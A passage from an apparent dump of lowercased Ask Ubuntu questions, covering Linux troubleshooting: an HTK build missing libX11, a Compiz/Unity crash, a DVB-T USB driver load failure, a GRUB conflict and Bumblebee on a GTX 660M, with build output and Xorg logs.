install-hdecode' ************************************************** and i typed 'make all ' . i can find following error message in the terminal output : /usr/bin/ld : can not find -lx11 . following is complete version of terminal output . ( cd htklib & & make htklib.a ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/geon-min/downloads/htk/htklib' gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hgraf.o hgraf.c hgraf.c : in function ‘decodekeypress’ : hgraf.c:179:8 : warning : variable ‘n’ set but not used [ -wunused-but-set-variable ] hgraf.c : in function ‘hgetevent’ : hgraf.c:221:18 : warning : variable ‘dummy’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o esig_asc.o esig_asc.c esig_asc.c : in function ‘readasciiescape’ : esig_asc.c:2025:16 : warning : ignoring return value of ‘fscanf’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o esig_edr.o esig_edr.c esig_edr.c : in function ‘readedrrecord’ : esig_edr.c:338:25 : warning : ‘flags’ may be used uninitialized in this function [ -wuninitialized ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o esignal.o esignal.c esignal.c : in function ‘getline’ : esignal.c:1760:9 : warning : ignoring return value of ‘fgets’ , declared with attribute warn_unused_result [ -wunused-result ] esignal.c : in function ‘getlong’ : esignal.c:1808:9 : warning : ignoring return value of ‘fgets’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o esig_nat.o esig_nat.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hadapt.o hadapt.c hadapt.c : in function ‘setsemitiedavcov’ : hadapt.c:1381:15 : warning : variable ‘si’ set but not used [ -wunused-but-set-variable ] hadapt.c : in function ‘parsenode’ : hadapt.c:1550:12 : warning : variable ‘size’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o harc.o harc.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o haudio.o haudio.c haudio.c : in function ‘startaudioinput’ : haudio.c:2174:11 : warning : ignoring return value of ‘read’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hdict.o hdict.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hexactmpe.o hexactmpe.c hexactmpe.c : in function ‘docorrectness’ : hexactmpe.c:288:58 : warning : value computed is not used [ -wunused-value ] hexactmpe.c:332:12 : warning : variable ‘cb’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hfb.o hfb.c hfb.c : in function ‘setotprob’ : hfb.c:999:15 : warning : variable ‘p’ set but not used [ -wunused-but-set-variable ] hfb.c : in function ‘setbeta’ : hfb.c:1161:12 : warning : variable ‘hset’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hfblat.o hfblat.c hfblat.c : in function ‘stepalpha’ : hfblat.c:737:20 : warning : variable ‘transp’ set but not used [ -wunused-but-set-variable ] hfblat.c : in function ‘doallmixupdates’ : hfblat.c:1070:33 : warning : variable ‘al_otvs’ set but not used [ -wunused-but-set-variable ] hfblat.c : in function ‘upmixparms’ : hfblat.c:1198:25 : warning : variable ‘vsize’ set but not used [ -wunused-but-set-variable ] hfblat.c : in function ‘stepforward’ : hfblat.c:1389:25 : warning : variable ‘bqt1’ set but not used [ -wunused-but-set-variable ] hfblat.c : in function ‘doallmixupdates’ : hfblat.c:1175:30 : warning : ‘mammi’ may be used uninitialized in this function [ -wuninitialized ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hlabel.o hlabel.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hlat.o hlat.c hlat.c : in function ‘latsetscores’ : hlat.c:690:14 : warning : variable ‘best’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hlm.o hlm.c hlm.c : in function ‘writengrams’ : hlm.c:235:16 : warning : variable ‘n’ set but not used [ -wunused-but-set-variable ] hlm.c : in function ‘readngrams’ : hlm.c:379:18 : warning : variable ‘size’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hmap.o hmap.c hmap.c : in function ‘totmixinset’ : hmap.c:384:10 : warning : variable ‘hmm’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hmath.o hmath.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hmem.o hmem.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hmodel.o hmodel.c hmodel.c : in function ‘compressitemlist’ : hmodel.c:1149:11 : warning : variable ‘p’ set but not used [ -wunused-but-set-variable ] hmodel.c : in function ‘createhmm’ : hmodel.c:4225:12 : warning : variable ‘newmacro’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hnet.o hnet.c hnet.c : in function ‘createxemodels’ : hnet.c:3144:36 : warning : variable ‘searchnode’ set but not used [ -wunused-but-set-variable ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hparm.o hparm.c hparm.c : in function ‘setwavespdetparms’ : hparm.c:2584:18 : warning : variable ‘nbl’ set but not used [ -wunused-but-set-variable ] hparm.c:2582:11 : warning : variable ‘v’ set but not used [ -wunused-but-set-variable ] hparm.c : in function ‘compresspblock’ : hparm.c:4945:16 : warning : variable ‘count’ set but not used [ -wunused-but-set-variable ] hparm.c : in function ‘openaschannel’ : hparm.c:4351:25 : warning : ‘initrows’ may be used uninitialized in this function [ -wuninitialized ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hrec.o hrec.c hrec.c : in function ‘latfrompaths’ : hrec.c:1650:33 : warning : ‘labid’ may be used uninitialized in this function [ -wuninitialized ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hshell.o hshell.c hshell.c : in function ‘keypressed’ : hshell.c:1489:14 : warning : ignoring return value of ‘read’ , declared with attribute warn_unused_result [ -wunused-result ] hshell.c : in function ‘nextarg’ : hshell.c:725:13 : warning : ignoring return value of ‘strtod’ , declared with attribute warn_unused_result [ -wunused-result ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hsigp.o hsigp.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o htrain.o htrain.c htrain.c : in function ‘restoreaccsparallel’ : htrain.c:1716:12 : warning : variable ‘size’ set but not used [ -wunused-but-set-variable ] htrain.c : in function ‘initclustering’ : htrain.c:755:22 : warning : ‘cov.var’ may be used uninitialized in this function [ -wuninitialized ] gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hutil.o hutil.c gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hvq.o hvq.c hvq.c : in function ‘loadvqtab’ : hvq.c:199:9 : warning : ‘cov.var’ may be used uninitialized in this function [ -wuninitialized ] hvq.c:169:15 : note : ‘cov.var’ was declared here gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hwave.o hwave.c hwave.c : in function ‘getaiffheaderinfo’ : hwave.c:997:22 : warning : variable ‘commchunk1’ set but not used [ -wunused-but-set-variable ] hwave.c : in function ‘getwavheaderinfo’ : hwave.c:1062:9 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1068:9 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1069:9 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1081:12 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1082:12 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1087:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1097:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1105:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1108:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1109:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1110:15 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c:1125:33 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result [ -wunused-result ] hwave.c : in function ‘putesigheaderinfo’ : hwave.c:1379:21 : warning : ‘inlist’ may be used uninitialized in this function [ -wuninitialized ] hwave.c : in function ‘openwaveinput’ : hwave.c:1042:18 : warning : ‘commchunk2.nsamples’ may be used uninitialized in this function [ -wuninitialized ] hwave.c:998:22 : note : ‘commchunk2.nsamples’ was declared here gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o strarr.o strarr.c if [ -f htklib.a ] ; then /bin/rm htklib.a ; fi ar rv htklib.a hgraf.o esig_asc.o esig_edr.o esignal.o esig_nat.o hadapt.o harc.o haudio.o hdict.o hexactmpe.o hfb.o hfblat.o hlabel.o hlat.o hlm.o hmap.o hmath.o hmem.o hmodel.o hnet.o hparm.o hrec.o hshell.o hsigp.o htrain.o hutil.o hvq.o hwave.o strarr.o ar : creating htklib.a a - hgraf.o a - esig_asc.o a - esig_edr.o a - esignal.o a - esig_nat.o a - hadapt.o a - harc.o a - haudio.o a - hdict.o a - hexactmpe.o a - hfb.o a - hfblat.o a - hlabel.o a - hlat.o a - hlm.o a - hmap.o a - hmath.o a - hmem.o a - hmodel.o a - hnet.o a - hparm.o a - hrec.o a - hshell.o a - hsigp.o a - htrain.o a - hutil.o a - hvq.o a - hwave.o a - strarr.o ranlib htklib.a make [ 1 ] : leaving directory `/home/geon-min/downloads/htk/htklib' ( cd htktools & & make all ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/geon-min/downloads/htk/htktools' if [ ! -d /usr/local/bin -a x_ = x_yes ] ; then mkdir -p /usr/local/bin ; fi if [ xhslab = xhslab ] ; then \ gcc -o hslab -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i../htklib -dphnalg hslab.c ../htklib/htklib.a -l/usr/x11r6/lib -lm -lx11 ; \ else \ gcc -o hslab -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i../htklib -dphnalg hslab.c ../htklib/htklib.a -l/usr/x11r6/lib -lm ; fi hslab.c : in function ‘fileexists’ : hslab.c:1209:12 : warning : variable ‘isexf’ set but not used [ -wunused-but-set-variable ] hslab.c : in function ‘dospecial’ : hslab.c:1596:13 : warning : ignoring return value of ‘system’ , declared with attribute warn_unused_result [ -wunused-result ] /usr/bin/ld : can not find -lx11 collect2 : ld returned 1 exit status make [ 1 ] : *** [ hslab ] error 1 make [ 1 ] : leaving directory `/home/geon-min/downloads/htk/htktools' make : *** [ htktools ] error 1 i already installed 'libx11-dev ' . but 'make all ' still does n't work . is there anyone giving me some comments ? i really appreciate your help . thank you !
178509	compiz crashed after a few tweaks , and now i can not start it again !	recently , i was meddling with ccsm and the window kept refreshing with every plugin addition ( which is normal i suppose ) . however , after i enabled svg ( i dont think this is relevant but i included it anyway ) under image loading , suddenly it got hung ! unity crashed , as i could n't see a top bar or a launcher ! my window decorations were out too ! i restarted the computer hoping it would fix anything , but it did n't work ! right now , all i can see on the screen in my mouse , the wallpaper and my desktop icons . right click works for me , and i can drag icons around the desktop . i can even run chrome ( using docky which works too ( except its in 2d , not in 3d ) ) i tried using unity -- reset and unity -- replace from the recovery console , but every time it hung . initializing core options ... done when i tried running compiz -- replace , it came back with this compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - fatal : could n't open display compiz ( core ) - info : stopping plugin : core compiz ( core ) - info : unloading plugin : core when i try running metacity -- replace : window manager error : unable to open x display when i try to run ccsm from the recovery , it does n't start up /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file '' /usr/lib/python2.7/dist-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file '' /usr/lib/python2.7/dist-packages/ccm/constants.py '' , line 30 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' please help me , and ask if you need any more info . xd thanks a ton ! ciao
178512	unable to load dvb-usb-rtl2832u driver in ubuntu 12.04	i am trying to setup a compro u680f usb dvb-t adaptor in ubuntu 12.04 ( kernel 3.2.0-29-generic ) . the compro device id is given ( lsusb ) as 185b:0680 . the following page suggests this device is supported by the rt2832u driver : http : //www.dfragos.me/2011/11/installation-of-the-rt2832u-driver-in-linux/ i successfully built the v4l-dvb package from source following this how to , using the `` basic approach '' : http : //linuxtv.org/wiki/index.php/how_to_obtain , _build_and_install_v4l-dvb_device_drivers after restarting the system the device does not appear to be working . the output from `` lsmod | grep dvb '' is as follows : root @ dctbox : /home/dct # lsmod | grep dvb dvb_usb 32369 0 dvb_core 110590 1 dvb_usb rc_core 26343 1 dvb_usb if i unplug the device and plug back in , i get the following from `` dmesg | tail '' : root @ dctbox : /home/dct # dmesg | tail -n 27 [ 160.015155 ] usb 5-2 : new high-speed usb device number 4 using xhci_hcd [ 160.051152 ] usb 5-2 : ep 0x81 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 160.133825 ] warning : you are using an experimental version of the media stack . [ 160.133826 ] as the driver is backported to an older kernel , it doesn't offer [ 160.133827 ] enough quality for its usage in production . [ 160.133828 ] use it with care . [ 160.133829 ] latest git patches ( needed if you report a bug to linux-media @ vger.kernel.org ) : [ 160.133830 ] 9b78c5a3007e10a172d4e83bea18509fdff2e8e3 [ media ] b2c2 : export b2c2_flexcop_debug symbol [ 160.133832 ] 88f8472c9fc6c08f5113887471f1f4aabf7b2929 [ media ] fix some makefile rules [ 160.133833 ] 893430558e5bf116179915de2d3d119ad25c01cf [ media ] cx23885-cards : fix netup card default revision [ 160.144374 ] warning : you are using an experimental version of the media stack . [ 160.144376 ] as the driver is backported to an older kernel , it doesn't offer [ 160.144377 ] enough quality for its usage in production . [ 160.144378 ] use it with care . [ 160.144379 ] latest git patches ( needed if you report a bug to linux-media @ vger.kernel.org ) : [ 160.144380 ] 9b78c5a3007e10a172d4e83bea18509fdff2e8e3 [ media ] b2c2 : export b2c2_flexcop_debug symbol [ 160.144381 ] 88f8472c9fc6c08f5113887471f1f4aabf7b2929 [ media ] fix some makefile rules [ 160.144383 ] 893430558e5bf116179915de2d3d119ad25c01cf [ media ] cx23885-cards : fix netup card default revision [ 160.173311 ] dvb_usb_rtl2832u : disagrees about version of symbol dvb_usb_device_init [ 160.173315 ] dvb_usb_rtl2832u : unknown symbol dvb_usb_device_init ( err -22 ) [ 392.860811 ] dvb_usb_rtl2832u : disagrees about version of symbol dvb_usb_device_init [ 392.860815 ] dvb_usb_rtl2832u : unknown symbol dvb_usb_device_init ( err -22 ) [ 1282.328055 ] usb 5-2 : usb disconnect , device number 4 [ 1288.697208 ] usb 5-2 : new high-speed usb device number 5 using xhci_hcd [ 1288.732785 ] usb 5-2 : ep 0x81 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 1288.747585 ] dvb_usb_rtl2832u : disagrees about version of symbol dvb_usb_device_init [ 1288.747589 ] dvb_usb_rtl2832u : unknown symbol dvb_usb_device_init ( err -22 ) if i attempt to load the driver manually i get the following error message : root @ dctbox : /home/dct # modprobe dvb_usb_rtl2832u fatal : error inserting dvb_usb_rtl2832u ( /lib/modules/3.2.0-29-generic/kernel/drivers/media/dvb/dvb-usb/dvb-usb-rtl2832u.ko ) : invalid argument any advice on how to get this device working successfully would be greatly appreciated . kind regards , marc
178513	can not overwrite debian6 grub , with ubuntu grub2	i installed debian 6 on the same pc where i am running different versions of ubuntu . debian 6 installed grub , probably a different version than ubuntu . i am running update-grub from ubuntu 10 , 11 & 12 and it does not overwrite the debian boot loader . the debian grub has failed to correctly define the boot options for 10.04 ubuntu distro , the other ubuntu distros where correctly defined . i had to modify the boot options at the grub prompt , intead of single , i wrote recovery nomodeset and i could load 10.04 ubuntu but not in the recovery mode .
178517	how do i get bumblebee working with a gtx 660m ?	i have a gtx 660m , also an integrated intel . the intel runs fine but i could n't start the nvidia . i followed all the steps to install and configure bumblebee from this tutorial and this other tutorial . this is the output : optirun -vv glxspheres [ 706.315737 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 706.316244 ] [ info ] configured driver : nvidia [ 706.444333 ] [ debug ] optirun version 3.0.1 starting ... [ 706.444367 ] [ debug ] active configuration : [ 706.444374 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 706.444380 ] [ debug ] x display : :8 [ 706.444386 ] [ debug ] ld_library_path : /usr/lib/nvidia-current : /usr/lib32/nvidia-current [ 706.444392 ] [ debug ] socket path : /var/run/bumblebee.socket [ 706.444398 ] [ debug ] vgl compression : proxy [ 708.358088 ] [ info ] response : no - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 708.358117 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 708.358125 ] [ debug ] socket closed. < [ 708.358147 ] [ error ] aborting because fallback start is disabled . [ 708.358155 ] [ debug ] killing all remaining processes . and this is the /var/log/xorg.8.log file [ 47.372 ] x.org x server 1.11.3 release date : 2011-12-16 [ 47.372 ] x protocol version 11 , revision 0 [ 47.372 ] build operating system : linux 2.6.42-26-generic x86_64 ubuntu [ 47.372 ] current operating system : linux babilonia-p170em 3.2.0-29-generic # 46- > ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 [ 47.372 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-29-generic > root=uuid=002bd5b6-9931-48ae-8c5e-2ac9bebe653e ro quiet splash vt.handoff=7 [ 47.372 ] build date : 04 august 2012 01:51:23am [ 47.372 ] xorg-server 2:1.11.4-0ubuntu10.7 ( for technical support please see > http : //www.ubuntu.com/support ) [ 47.372 ] current version of pixman : 0.24.4 [ 47.372 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 47.372 ] markers : ( -- ) probed , ( ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 47.372 ] ( == ) log file : `` /var/log/xorg.8.log '' , time : tue aug 21 22:06:06 2012 [ 47.372 ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 47.372 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 47.373 ] ( == ) serverlayout `` layout0 '' [ 47.373 ] ( == ) no screen section available . using defaults . [ 47.373 ] ( ) | -- > screen `` default screen section '' ( 0 ) [ 47.373 ] ( ) | | -- > monitor `` '' [ 47.373 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 47.373 ] ( ) | | -- > device `` device1 '' [ 47.373 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 47.373 ] ( ) option `` autoadddevices '' `` false '' [ 47.373 ] ( ) not automatically adding devices [ 47.373 ] ( == ) automatically enabling devices [ 47.373 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does > not exist . [ 47.373 ] entry deleted from font path . [ 47.373 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 47.373 ] ( ++ ) modulepath set to `` /usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules '' [ 47.373 ] ( == ) | -- > input device `` '' [ 47.373 ] ( == ) | -- > input device `` '' [ 47.373 ] ( == ) the core pointer device was n't specified explicitly in the layout . using the default mouse configuration . [ 47.373 ] ( == ) the core keyboard device was n't specified explicitly in the layout . using the default keyboard configuration . [ 47.373 ] ( ii ) loader magic : 0x7f6a17e02b00 [ 47.373 ] ( ii ) module abi versions : [ 47.373 ] x.org ansi c emulation : 0.4 [ 47.373 ] x.org video driver : 11.0 [ 47.373 ] x.org xinput driver : 16.0 [ 47.373 ] x.org server extension : 6.0 [ 47.374 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0fd4:1558:7102 rev 161 , mem @ 0xf6000000/16777216 , 0xe0000000/268435456 , 0xf0000000/33554432 , i/o @ 0x0000e000/128 , bios @ > 0x ? ? ? ? ? ? ? ? /524288 [ 47.374 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 47.374 ] ( ii ) loadmodule : `` extmod '' [ 47.374 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 47.374 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 47.374 ] compiled for 1.11.3 , module version = 1.0.0 [ 47.374 ] module class : x.org server extension [ 47.374 ] abi class : x.org server extension , version 6.0 [ 47.374 ] ( ii ) loading extension mit-screen-saver [ 47.374 ] ( ii ) loading extension xfree86-vidmodeextension [ 47.374 ] ( ii ) loading extension xfree86-dga [ 47.374 ] ( ii ) loading extension dpms [ 47.374 ] ( ii ) loading extension xvideo [ 47.374 ] ( ii ) loading extension xvideo-motioncompensation [ 47.374 ] ( ii ) loading extension x-resource [ 47.374 ] ( ii ) loadmodule : `` dbe '' [ 47.374 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 47.374 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 47.374 ] compiled for 1.11.3 , module version = 1.0.0 [ 47.374 ] module class : x.org server extension [ 47.374 ] abi class : x.org server extension , version 6.0 [ 47.374 ] ( ii ) loading extension double-buffer [ 47.374 ] ( ii ) loadmodule : `` glx '' [ 47.374 ] ( ii ) loading /usr/lib/nvidia-current/xorg/libglx.so [ 47.432 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 47.432 ] compiled for 4.0.2 , module version = 1.0.0 [ 47.432 ] module class : x.org server extension [ 47.432 ] ( ii ) nvidia glx module 304.37 wed aug 8 20:16:03 pdt 2012 [ 47.432 ] ( ii ) loading extension glx [ 47.432 ] ( ii ) loadmodule : `` record '' [ 47.432 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 47.432 ] ( ii ) module record : vendor= '' x.org foundation '' [ 47.432 ] compiled for 1.11.3 , module version = 1.13.0 [ 47.432 ] module class : x.org server extension [ 47.432 ] abi class : x.org server extension , version 6.0 [ 47.432 ] ( ii ) loading extension record [ 47.432 ] ( ii ) loadmodule : `` dri '' [ 47.432 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 47.432 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 47.432 ] compiled for 1.11.3 , module version = 1.0.0 [ 47.432 ] abi class : x.org server extension , version 6.0 [ 47.432 ] ( ii ) loading extension xfree86-dri [ 47.432 ] ( ii ) loadmodule : `` dri2 '' [ 47.432 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 47.432 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 47.432 ] compiled for 1.11.3 , module version = 1.2.0 [ 47.432 ] abi class : x.org server extension , version 6.0 [ 47.433 ] ( ii ) loading extension dri2 [ 47.433 ] ( ii ) loadmodule : `` nvidia '' [ 47.433 ] ( ii ) loading /usr/lib/nvidia-current/xorg/nvidia_drv.so [ 47.438 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 47.438 ] compiled for 4.0.2 , module version = 1.0.0 [ 47.438 ] module class : x.org video driver [ 47.439 ] ( ii ) loadmodule : `` mouse '' [ 47.440 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 47.440 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 47.440 ] compiled for 1.11.3 , module version = 1.7.1 [ 47.440 ] module class : x.org xinput driver [ 47.440 ] abi class : x.org xinput driver , version 16.0 [ 47.440 ] ( ii ) loadmodule : `` kbd '' [ 47.440 ] ( ww ) warning , could n't open module kbd [ 47.440 ] ( ii ) unloadmodule : `` kbd '' [ 47.440 ] ( ii ) unloading kbd [ 47.440 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 47.440 ] ( ii ) nvidia dlloader x driver 304.37 wed aug 8 19:54:47 pdt 2012 [ 47.440 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 47.441 ] ( -- ) using vt number 7 [ 47.441 ] ( ii ) loading sub module `` fb '' [ 47.441 ] ( ii ) loadmodule : `` fb '' [ 47.441 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 47.441 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 47.441 ] compiled for 1.11.3 , module version = 1.0.0 [ 47.441 ] abi class : x.org ansi c emulation , version 0.4 [ 47.441 ] ( ii ) loading sub module `` wfb '' [ 47.441 ] ( ii ) loadmodule : `` wfb '' [ 47.442 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 47.443 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 47.443 ] compiled for 1.11.3 , module version = 1.0.0 [ 47.443 ] abi class : x.org ansi c emulation , version 0.4 [ 47.443 ] ( ii ) loading sub module `` ramdac '' [ 47.443 ] ( ii ) loadmodule : `` ramdac '' [ 47.443 ] ( ii ) module `` ramdac '' already built-in [ 47.444 ] ( ii ) loading /usr/lib/nvidia-current/xorg/nvidia_drv.so [ 47.444 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 47.444 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 47.444 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 47.444 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 47.444 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 47.444 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 47.444 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 47.444 ] ( ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 47.444 ] ( ) nvidia ( 0 ) : option `` useedid '' `` false '' [ 47.444 ] ( ) nvidia ( 0 ) : option `` connectedmonitor '' `` dfp '' [ 47.444 ] ( ) nvidia ( 0 ) : enabling 2d acceleration [ 47.444 ] ( ) nvidia ( 0 ) : connectedmonitor string : `` dfp '' [ 47.444 ] ( ) nvidia ( 0 ) : ignoring edids [ 48.321 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gtx 660m ( gk107 ) at 